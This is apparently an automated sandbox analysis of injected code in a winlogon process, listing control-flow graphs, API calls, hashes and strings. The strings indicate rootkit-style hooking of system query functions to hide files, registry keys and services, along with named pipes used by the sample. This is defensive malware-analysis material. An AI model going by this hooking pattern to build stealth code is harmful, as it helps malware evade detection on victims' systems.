                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                • Instruction ID: 944e82db3403cf074b4c20140e3f4fe526249a22eecae15d0e28de081167e2ad
                                                • Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                • Instruction Fuzzy Hash: A8D19A7A20CF9892DA70DB5AE49835A77A0F7C8B85F104256EACE47BA5DF3CC541CB00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 123 225dc6451b0-225dc6451dc 124 225dc6451ed-225dc6451f6 123->124 125 225dc6451de-225dc6451e6 123->125 126 225dc645207-225dc645210 124->126 127 225dc6451f8-225dc645200 124->127 125->124 128 225dc645221-225dc64522a 126->128 129 225dc645212-225dc64521a 126->129 127->126 130 225dc64522c-225dc645231 128->130 131 225dc645236-225dc645241 GetCurrentThreadId 128->131 129->128 132 225dc6457b3-225dc6457ba 130->132 133 225dc645243-225dc645248 131->133 134 225dc64524d-225dc645254 131->134 133->132 135 225dc645256-225dc64525c 134->135 136 225dc645261-225dc64526a 134->136 135->132 137 225dc64526c-225dc645271 136->137 138 225dc645276-225dc645282 136->138 137->132 139 225dc645284-225dc6452a9 138->139 140 225dc6452ae-225dc645305 call 225dc6457c0 * 2 138->140 139->132 145 225dc64531a-225dc645323 140->145 146 225dc645307-225dc64530e 140->146 149 225dc645335-225dc64533e 145->149 150 225dc645325-225dc645332 145->150 147 225dc645316 146->147 148 225dc645310 146->148 152 225dc645386-225dc64538a 147->152 151 225dc645390-225dc645396 148->151 153 225dc645353-225dc645378 call 225dc647950 149->153 154 225dc645340-225dc645350 149->154 150->149 156 225dc6453c5-225dc6453cb 151->156 157 225dc645398-225dc6453b4 call 225dc644470 151->157 152->151 162 225dc64540d-225dc645422 call 225dc643da0 153->162 163 225dc64537e 153->163 154->153 160 225dc6453f5-225dc645408 156->160 161 225dc6453cd-225dc6453ec call 225dc64798c 156->161 157->156 166 225dc6453b6-225dc6453be 157->166 160->132 161->160 170 225dc645431-225dc64543a 162->170 171 225dc645424-225dc64542c 162->171 163->152 166->156 172 225dc64544c-225dc64549a call 225dc648d50 170->172 173 225dc64543c-225dc645449 170->173 171->152 176 225dc6454a2-225dc6454aa 172->176 173->172 177 225dc6455b7-225dc6455bf 176->177 178 225dc6454b0-225dc64559b call 225dc647520 176->178 179 225dc6455c1-225dc6455d4 call 225dc644670 177->179 180 225dc645603-225dc64560b 177->180 190 225dc64559d 178->190 191 225dc64559f-225dc6455ae call 225dc644140 178->191 192 225dc6455d6 179->192 193 225dc6455d8-225dc645601 179->193 183 225dc645617-225dc645626 180->183 184 225dc64560d-225dc645615 180->184 188 225dc645628 183->188 189 225dc64562f 183->189 184->183 187 225dc645634-225dc645641 184->187 195 225dc645643 187->195 196 225dc645644-225dc645699 call 225dc6486a0 187->196 188->189 189->187 190->177 200 225dc6455b2 191->200 201 225dc6455b0 191->201 192->180 193->177 195->196 202 225dc64569b-225dc6456a3 196->202 203 225dc6456a8-225dc645741 call 225dc6445f0 call 225dc644550 VirtualProtect 196->203 200->176 201->177 208 225dc645751-225dc6457b1 203->208 209 225dc645743-225dc645748 GetLastError 203->209 208->132 209->208
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                • Instruction ID: db88e7363c8c6d67948adb73f6fa9911972c13677c94ce65f9111591e5b650f5
                                                • Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                • Instruction Fuzzy Hash: 0002D93A21DB9496E760CB99E49435AB7A1F3C5B85F104155EB8E87BA8EF7CC484CF00

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: ebfbda4d6f83f092f5b40694f6fedf07c780684687202726d78380dbc3561c7a
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 7D113C2A718F54A3EB149BA9F40866AB6A0F748F85F148439DE8A07794EF3DC504C700

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocQuery
                                                • String ID:
                                                • API String ID: 31662377-0
                                                • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction ID: a5174926809f1d8a058b45505692cd786dcb26961728ddb02e83bed768d52ab0
                                                • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction Fuzzy Hash: 5D31102621DE98A1EA30DB9DE05835A72A0F398B85F108575F5CF46BA8DF7DC580CB00

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: f74e7b676ed9400ac381515b8e9436b1a81361eff809a806e376a47053f7f487
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 32115B7862CF39B2FB21EBEDA80E7993291AB54B07F54C4759A1785194EF3DC044C210

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                • String ID:
                                                • API String ID: 3733156554-0
                                                • Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                • Instruction ID: 478e726ee42b9ad2565bb85821ddd20a54e3ccf57beded389c022ecaab978b6a
                                                • Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                • Instruction Fuzzy Hash: 61F0D06A21CF54D1D630DB49E45575A77A0E3CC7D5F148155F98E07BA9CE39C181CF00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 263 225dc612908-225dc612973 call 225dc610f34 * 4 272 225dc612979-225dc61297c 263->272 273 225dc612b8b 263->273 272->273 275 225dc612982-225dc612985 272->275 274 225dc612b8d-225dc612ba9 273->274 275->273 276 225dc61298b-225dc61298e 275->276 276->273 277 225dc612994-225dc6129b2 VirtualAlloc 276->277 277->273 278 225dc6129b8-225dc6129dc call 225dc610d6c 277->278 281 225dc612a0b-225dc612a12 278->281 282 225dc6129de-225dc612a09 call 225dc610d6c 278->282 284 225dc612a18-225dc612a25 281->284 285 225dc612ab2-225dc612ab9 281->285 282->281 284->285 289 225dc612a2b-225dc612a39 LoadLibraryA 284->289 286 225dc612b6c-225dc612b89 285->286 287 225dc612abf-225dc612ad6 285->287 286->274 287->286 290 225dc612adc 287->290 291 225dc612a3b-225dc612a45 289->291 292 225dc612a9d-225dc612aa5 289->292 295 225dc612ae2-225dc612af7 290->295 296 225dc612a48-225dc612a4c 291->296 292->289 293 225dc612aa7-225dc612aac 292->293 293->285 297 225dc612af9-225dc612b0a 295->297 298 225dc612b5b-225dc612b66 295->298 299 225dc612a9a 296->299 300 225dc612a4e-225dc612a52 296->300 302 225dc612b15-225dc612b19 297->302 303 225dc612b0c-225dc612b13 297->303 298->286 298->295 299->292 304 225dc612a7d-225dc612a87 300->304 305 225dc612a54-225dc612a7b 300->305 307 225dc612b1b-225dc612b22 302->307 308 225dc612b24-225dc612b28 302->308 306 225dc612b48-225dc612b59 303->306 309 225dc612a8d-225dc612a98 304->309 305->309 306->297 306->298 307->306 310 225dc612b3a-225dc612b3e 308->310 311 225dc612b2a-225dc612b38 308->311 309->296 310->306 312 225dc612b40-225dc612b43 310->312 311->306 312->306
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2929517041.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc610000_winlogon.jbxd
                                                Similarity
                                                • API ID: AllocLibraryLoadVirtual
                                                • String ID:
                                                • API String ID: 3550616410-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 084b2b25044c8794af9290a18b9c690fa1b2fa5669142dee8622e2e675240a44
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 0C61253A702A6297EF69CF9DD44876DB3D1FB04B9AF14C021DA1907785DB38E952C700

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00000225DC641650: GetProcessHeap.KERNEL32 ref: 00000225DC64165B
                                                  • Part of subcall function 00000225DC641650: HeapAlloc.KERNEL32 ref: 00000225DC64166A
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DA
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641707
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641721
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641741
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC64175C
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64177C
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641797
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417B7
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6417D2
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417F2
                                                • Sleep.KERNEL32 ref: 00000225DC641C43
                                                • SleepEx.KERNEL32 ref: 00000225DC641C49
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC64180D
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64182D
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641848
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641868
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641883
                                                  • Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6418A3
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6418BE
                                                  • Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6418C8
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 9e56ec6e1a2bb83d4d1e20ad845025165e388ca77e262dcd1bfd0d10c7f0d1f5
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: B53101AD21CE21B1FF549FBED94935A37E4AB44BCAF14D0A1DE0B87696EE34C850C250

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 415 225dc642cdc-225dc642d55 call 225dc65ecc0 418 225dc642d5b-225dc642d61 415->418 419 225dc643090-225dc6430b3 415->419 418->419 420 225dc642d67-225dc642d6a 418->420 420->419 421 225dc642d70-225dc642d73 420->421 421->419 422 225dc642d79-225dc642d89 GetModuleHandleA 421->422 423 225dc642d8b-225dc642d9b call 225dc653090 422->423 424 225dc642d9d 422->424 426 225dc642da0-225dc642dbe 423->426 424->426 426->419 429 225dc642dc4-225dc642de3 StrCmpNIW 426->429 429->419 430 225dc642de9-225dc642ded 429->430 430->419 431 225dc642df3-225dc642dfd 430->431 431->419 432 225dc642e03-225dc642e0a 431->432 432->419 433 225dc642e10-225dc642e23 432->433 434 225dc642e25-225dc642e31 433->434 435 225dc642e33 433->435 436 225dc642e36-225dc642e3a 434->436 435->436 437 225dc642e4a 436->437 438 225dc642e3c-225dc642e48 436->438 439 225dc642e4d-225dc642e57 437->439 438->439 440 225dc642f4d-225dc642f51 439->440 441 225dc642e5d-225dc642e60 439->441 444 225dc642f57-225dc642f5a 440->444 445 225dc643082-225dc64308a 440->445 442 225dc642e72-225dc642e7c 441->442 443 225dc642e62-225dc642e6f call 225dc641a14 441->443 447 225dc642e7e-225dc642e8b 442->447 448 225dc642eb0-225dc642eba 442->448 443->442 449 225dc642f6b-225dc642f75 444->449 450 225dc642f5c-225dc642f68 call 225dc641a14 444->450 445->419 445->433 447->448 455 225dc642e8d-225dc642e9a 447->455 456 225dc642eea-225dc642eed 448->456 457 225dc642ebc-225dc642ec9 448->457 452 225dc642fa5-225dc642fa8 449->452 453 225dc642f77-225dc642f84 449->453 450->449 462 225dc642faa-225dc642fb3 call 225dc641d28 452->462 463 225dc642fb5-225dc642fc2 lstrlenW 452->463 453->452 461 225dc642f86-225dc642f93 453->461 464 225dc642e9d-225dc642ea3 455->464 459 225dc642efb-225dc642f08 lstrlenW 456->459 460 225dc642eef-225dc642ef9 call 225dc641d28 456->460 457->456 465 225dc642ecb-225dc642ed8 457->465 467 225dc642f0a-225dc642f14 459->467 468 225dc642f2b-225dc642f3d call 225dc643930 459->468 460->459 472 225dc642f43-225dc642f48 460->472 469 225dc642f96-225dc642f9c 461->469 462->463 479 225dc642ffa-225dc643005 462->479 473 225dc642fe5-225dc642fef call 225dc643930 463->473 474 225dc642fc4-225dc642fce 463->474 471 225dc642ea9-225dc642eae 464->471 464->472 475 225dc642edb-225dc642ee1 465->475 467->468 478 225dc642f16-225dc642f29 call 225dc641554 467->478 468->472 483 225dc642ff2-225dc642ff4 468->483 469->479 480 225dc642f9e-225dc642fa3 469->480 471->448 471->464 472->483 473->483 474->473 484 225dc642fd0-225dc642fe3 call 225dc641554 474->484 475->472 485 225dc642ee3-225dc642ee8 475->485 478->468 478->472 487 225dc64307c-225dc643080 479->487 488 225dc643007-225dc64300b 479->488 480->452 480->469 483->445 483->479 484->473 484->479 485->456 485->475 487->445 492 225dc643013-225dc64302d call 225dc6486a0 488->492 493 225dc64300d-225dc643011 488->493 496 225dc643030-225dc643033 492->496 493->492 493->496 499 225dc643035-225dc643053 call 225dc6486a0 496->499 500 225dc643056-225dc643059 496->500 499->500 500->487 502 225dc64305b-225dc643079 call 225dc6486a0 500->502 502->487
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 13e21aab0bda9cc4e5bc9a85af016e9a731f36370949422a27c399fe7f801b24
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 1FB1A16A22CE74A1EBA58FADC4487A973A4FB44F86F649066EE0A53794DF35CC41C340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 74af288e059d5c8d23f4d410f0be3976c1ac1cdc9bcb8f1d8e07bdf2c6108118
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 0C318376219F90A6EB60DFA4E8447ED7360F784B45F44852ADB4E47B98EF38C648CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 31acfc79b5b35cb9e1e8501721361a76cb7a9afdb4b51760c87d5441e5bab70d
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 5E31923A218F90A6DB60CF79E84439E73A4F788B55F504526EB9E43B95DF38C545CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: fe454cc261bdb08bb9bf612984af53997641b1df6e52c17f631db44c18d12b1f
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 25E1043A728FA0AAE710CFA8D4882DD7BB1F3457C9F248516DF4A57B99DA34C51AC700
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                • Instruction ID: cd021be3b7f994735f8efe401c0160f1a902b8f3b311327af9ee367ef9e6a18a
                                                • Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                • Instruction Fuzzy Hash: A551FB2A71CFA0A4FB20DBBAE90879E7BA5B784BD5F148154EE5A47F95CB34C141C700
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2929517041.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc610000_winlogon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                • Instruction ID: cc696e65a456b63b99bc5d4aa4762c6fec622c4d598d1fb74e675c82790ada62
                                                • Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                • Instruction Fuzzy Hash: E8F096B57146A49BEBA4CF6CA846B19B7E0F3083C6F80C529D68AC3B04D33C8461DF04

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: c77c60887f5eec905f9c55c612795a7d8c3603e9356656533834664b1217e901
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 61518EBA218F54A3EB24DFAAE54839AB3A1F788F85F148125DB4A07B14DF38C055C740

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 197445dab69a72c6b2701a4be11a1dbf2a87165c78cac1134486ad74d2a900e6
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 263197AC128D7AB1EB06EFEDE8596E43321B784746FF0D553E61A031A69E38C249C340

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 97d4650460fd1ed870c178f8d23a3eff64fab07327a250838c03ffd6b33ea587
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 8721217A628F50A3F710CB69E54835A77A0F789FA5F608215EA5907BA8DF3CC149CB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: ca7602a269add0734a0897c8356ebd1df981e37aa2bd2fa69252cf5db3528a0f
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: FB418077218B90E7E7648FA6E44879AB7A1F389B85F008125DB8A07B54DF38D165CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: d6c8d0038f703ef3555841080360c3dda4cb30d5e061eb806b4afe574bebbefd
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 8F81E43C71CEB1BAFB50ABED984D3993291AB85B82F54C4A59A07477D6DB38C845CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2929517041.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc610000_winlogon.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 03597595ed45fa0fe2af49a01b95c5b3d39fbf82cb5407b1408a8d0594ee632b
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: A581222D702E71BAFE60ABEE944939967E0EB95783F44C025AF4643792DB38C946C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: a20be75b842d5dbd9bbbcbb21bfa971a606c85aff1cb8e04c4579895d74161fa
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 5A31A63925EF60B5EE129B9EA8087997398B709FA6F198965DD2F47344DF38C446C300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
